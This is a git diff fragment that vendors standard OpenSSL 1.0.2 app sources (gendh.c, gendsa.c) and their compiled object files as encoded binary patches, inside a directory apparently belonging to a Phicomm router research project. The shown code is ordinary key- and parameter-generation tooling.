+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/opensslconf.h>
+/*
+ * Until the key-gen callbacks are modified to use newer prototypes, we allow
+ * deprecated functions for openssl-internal code
+ */
+#ifdef OPENSSL_NO_DEPRECATED
+# undef OPENSSL_NO_DEPRECATED
+#endif
+
+#ifndef OPENSSL_NO_DH
+# include <stdio.h>
+# include <string.h>
+# include <sys/types.h>
+# include <sys/stat.h>
+# include "apps.h"
+# include <openssl/bio.h>
+# include <openssl/rand.h>
+# include <openssl/err.h>
+# include <openssl/bn.h>
+# include <openssl/dh.h>
+# include <openssl/x509.h>
+# include <openssl/pem.h>
+
+# define DEFBITS 2048
+# undef PROG
+# define PROG gendh_main
+
+static int MS_CALLBACK dh_cb(int p, int n, BN_GENCB *cb);
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    BN_GENCB cb;
+    DH *dh = NULL;
+    int ret = 1, num = DEFBITS;
+    int g = 2;
+    char *outfile = NULL;
+    char *inrand = NULL;
+# ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+# endif
+    BIO *out = NULL;
+
+    apps_startup();
+
+    BN_GENCB_set(&cb, dh_cb, bio_err);
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    argv++;
+    argc--;
+    for (;;) {
+        if (argc <= 0)
+            break;
+        if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-2") == 0)
+            g = 2;
+/*-     else if (strcmp(*argv,"-3") == 0)
+                g=3; */
+        else if (strcmp(*argv, "-5") == 0)
+            g = 5;
+# ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        }
+# endif
+        else if (strcmp(*argv, "-rand") == 0) {
+            if (--argc < 1)
+                goto bad;
+            inrand = *(++argv);
+        } else
+            break;
+        argv++;
+        argc--;
+    }
+    if ((argc >= 1) && ((sscanf(*argv, "%d", &num) == 0) || (num < 0))) {
+ bad:
+        BIO_printf(bio_err, "usage: gendh [args] [numbits]\n");
+        BIO_printf(bio_err, " -out file - output the key to 'file\n");
+        BIO_printf(bio_err, " -2        - use 2 as the generator value\n");
+        /*
+         * BIO_printf(bio_err," -3 - use 3 as the generator value\n");
+         */
+        BIO_printf(bio_err, " -5        - use 5 as the generator value\n");
+# ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   " -engine e - use engine e, possibly a hardware device.\n");
+# endif
+        BIO_printf(bio_err, " -rand file%cfile%c...\n", LIST_SEPARATOR_CHAR,
+                   LIST_SEPARATOR_CHAR);
+        BIO_printf(bio_err,
+                   "           - load the file (or the files in the directory) into\n");
+        BIO_printf(bio_err, "             the random number generator\n");
+        goto end;
+    }
+# ifndef OPENSSL_NO_ENGINE
+    setup_engine(bio_err, engine, 0);
+# endif
+
+    out = BIO_new(BIO_s_file());
+    if (out == NULL) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+# ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+# endif
+    } else {
+        if (BIO_write_filename(out, outfile) <= 0) {
+            perror(outfile);
+            goto end;
+        }
+    }
+
+    if (!app_RAND_load_file(NULL, bio_err, 1) && inrand == NULL) {
+        BIO_printf(bio_err,
+                   "warning, not much extra random data, consider using the -rand option\n");
+    }
+    if (inrand != NULL)
+        BIO_printf(bio_err, "%ld semi-random bytes loaded\n",
+                   app_RAND_load_files(inrand));
+
+    BIO_printf(bio_err,
+               "Generating DH parameters, %d bit long safe prime, generator %d\n",
+               num, g);
+    BIO_printf(bio_err, "This is going to take a long time\n");
+
+    if (((dh = DH_new()) == NULL)
+        || !DH_generate_parameters_ex(dh, num, g, &cb))
+        goto end;
+
+    app_RAND_write_file(NULL, bio_err);
+
+    if (!PEM_write_bio_DHparams(out, dh))
+        goto end;
+    ret = 0;
+ end:
+    if (ret != 0)
+        ERR_print_errors(bio_err);
+    if (out != NULL)
+        BIO_free_all(out);
+    if (dh != NULL)
+        DH_free(dh);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+static int MS_CALLBACK dh_cb(int p, int n, BN_GENCB *cb)
+{
+    char c = '*';
+
+    if (p == 0)
+        c = '.';
+    if (p == 1)
+        c = '+';
+    if (p == 2)
+        c = '*';
+    if (p == 3)
+        c = '\n';
+    BIO_write(cb->arg, &c, 1);
+    (void)BIO_flush(cb->arg);
+# ifdef LINT
+    p = n;
+# endif
+    return 1;
+}
+#else                           /* !OPENSSL_NO_DH */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/gendh.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/gendh.o
new file mode 100644
index 0000000000000000000000000000000000000000..0f5f0a8470497cfc84e8dedcb1ec2be6d9ac5553
GIT binary patch
literal 6424
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
BXE6W(

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/gendsa.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/gendsa.c
new file mode 100644
index 0000000..fd1360a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/gendsa.c
@@ -0,0 +1,287 @@
+/* apps/gendsa.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/opensslconf.h> /* for OPENSSL_NO_DSA */
+#ifndef OPENSSL_NO_DSA
+# include <stdio.h>
+# include <string.h>
+# include <sys/types.h>
+# include <sys/stat.h>
+# include "apps.h"
+# include <openssl/bio.h>
+# include <openssl/err.h>
+# include <openssl/bn.h>
+# include <openssl/dsa.h>
+# include <openssl/x509.h>
+# include <openssl/pem.h>
+
+# define DEFBITS 512
+# undef PROG
+# define PROG gendsa_main
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    DSA *dsa = NULL;
+    int ret = 1;
+    char *outfile = NULL;
+    char *inrand = NULL, *dsaparams = NULL;
+    char *passargout = NULL, *passout = NULL;
+    BIO *out = NULL, *in = NULL;
+    const EVP_CIPHER *enc = NULL;
+# ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+# endif
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    argv++;
+    argc--;
+    for (;;) {
+        if (argc <= 0)
+            break;
+        if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-passout") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargout = *(++argv);
+        }
+# ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        }
+# endif
+        else if (strcmp(*argv, "-rand") == 0) {
+            if (--argc < 1)
+                goto bad;
+            inrand = *(++argv);
+        } else if (strcmp(*argv, "-") == 0)
+            goto bad;
+# ifndef OPENSSL_NO_DES
+        else if (strcmp(*argv, "-des") == 0)
+            enc = EVP_des_cbc();
+        else if (strcmp(*argv, "-des3") == 0)
+            enc = EVP_des_ede3_cbc();
+# endif
+# ifndef OPENSSL_NO_IDEA
+        else if (strcmp(*argv, "-idea") == 0)
+            enc = EVP_idea_cbc();
+# endif
+# ifndef OPENSSL_NO_SEED
+        else if (strcmp(*argv, "-seed") == 0)
+            enc = EVP_seed_cbc();
+# endif
+# ifndef OPENSSL_NO_AES
+        else if (strcmp(*argv, "-aes128") == 0)
+            enc = EVP_aes_128_cbc();
+        else if (strcmp(*argv, "-aes192") == 0)
+            enc = EVP_aes_192_cbc();
+        else if (strcmp(*argv, "-aes256") == 0)
+            enc = EVP_aes_256_cbc();
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+        else if (strcmp(*argv, "-camellia128") == 0)
+            enc = EVP_camellia_128_cbc();
+        else if (strcmp(*argv, "-camellia192") == 0)
+            enc = EVP_camellia_192_cbc();
+        else if (strcmp(*argv, "-camellia256") == 0)
+            enc = EVP_camellia_256_cbc();
+# endif
+        else if (**argv != '-' && dsaparams == NULL) {
+            dsaparams = *argv;
+        } else
+            goto bad;
+        argv++;
+        argc--;
+    }
+
+    if (dsaparams == NULL) {
+ bad:
+        BIO_printf(bio_err, "usage: gendsa [args] dsaparam-file\n");
+        BIO_printf(bio_err, " -out file - output the key to 'file'\n");
+# ifndef OPENSSL_NO_DES
+        BIO_printf(bio_err,
+                   " -des      - encrypt the generated key with DES in cbc mode\n");
+        BIO_printf(bio_err,
+                   " -des3     - encrypt the generated key with DES in ede cbc mode (168 bit key)\n");
+# endif
+# ifndef OPENSSL_NO_IDEA
+        BIO_printf(bio_err,
+                   " -idea     - encrypt the generated key with IDEA in cbc mode\n");
+# endif
+# ifndef OPENSSL_NO_SEED
+        BIO_printf(bio_err, " -seed\n");
+        BIO_printf(bio_err,
+                   "                 encrypt PEM output with cbc seed\n");
+# endif
+# ifndef OPENSSL_NO_AES
+        BIO_printf(bio_err, " -aes128, -aes192, -aes256\n");
+        BIO_printf(bio_err,
+                   "                 encrypt PEM output with cbc aes\n");
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+        BIO_printf(bio_err, " -camellia128, -camellia192, -camellia256\n");
+        BIO_printf(bio_err,
+                   "                 encrypt PEM output with cbc camellia\n");
+# endif
+# ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   " -engine e - use engine e, possibly a hardware device.\n");
+# endif
+        BIO_printf(bio_err, " -rand file%cfile%c...\n", LIST_SEPARATOR_CHAR,
+                   LIST_SEPARATOR_CHAR);
+        BIO_printf(bio_err,
+                   "           - load the file (or the files in the directory) into\n");
+        BIO_printf(bio_err, "             the random number generator\n");
+        BIO_printf(bio_err, " dsaparam-file\n");
+        BIO_printf(bio_err,
+                   "           - a DSA parameter file as generated by the dsaparam command\n");
+        goto end;
+    }
+# ifndef OPENSSL_NO_ENGINE
+    setup_engine(bio_err, engine, 0);
+# endif
+
+    if (!app_passwd(bio_err, NULL, passargout, NULL, &passout)) {
+        BIO_printf(bio_err, "Error getting password\n");
+        goto end;
+    }
+
+    in = BIO_new(BIO_s_file());
+    if (!(BIO_read_filename(in, dsaparams))) {
+        perror(dsaparams);
+        goto end;
+    }
+
+    if ((dsa = PEM_read_bio_DSAparams(in, NULL, NULL, NULL)) == NULL) {
+        BIO_printf(bio_err, "unable to load DSA parameter file\n");
+        goto end;
+    }
+    BIO_free(in);
+    in = NULL;
+
+    out = BIO_new(BIO_s_file());
+    if (out == NULL)
+        goto end;
+
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+# ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+# endif
+    } else {
+        if (BIO_write_filename(out, outfile) <= 0) {
+            perror(outfile);
+            goto end;
+        }
+    }
+
+    if (!app_RAND_load_file(NULL, bio_err, 1) && inrand == NULL) {
+        BIO_printf(bio_err,
+                   "warning, not much extra random data, consider using the -rand option\n");
+    }
+    if (inrand != NULL)
+        BIO_printf(bio_err, "%ld semi-random bytes loaded\n",
+                   app_RAND_load_files(inrand));
+
+    BIO_printf(bio_err, "Generating DSA key, %d bits\n", BN_num_bits(dsa->p));
+    if (!DSA_generate_key(dsa))
+        goto end;
+
+    app_RAND_write_file(NULL, bio_err);
+
+    if (!PEM_write_bio_DSAPrivateKey(out, dsa, enc, NULL, 0, NULL, passout))
+        goto end;
+    ret = 0;
+ end:
+    if (ret != 0)
+        ERR_print_errors(bio_err);
+    if (in != NULL)
+        BIO_free(in);
+    if (out != NULL)
+        BIO_free_all(out);
+    if (dsa != NULL)
+        DSA_free(dsa);
+    if (passout)
+        OPENSSL_free(passout);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+#else                           /* !OPENSSL_NO_DSA */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/gendsa.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/gendsa.o
new file mode 100644
index 0000000000000000000000000000000000000000..57fc441800f4d5ee39c46bbd09c0ab12e5b1bf71
GIT binary patch
literal 9544
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
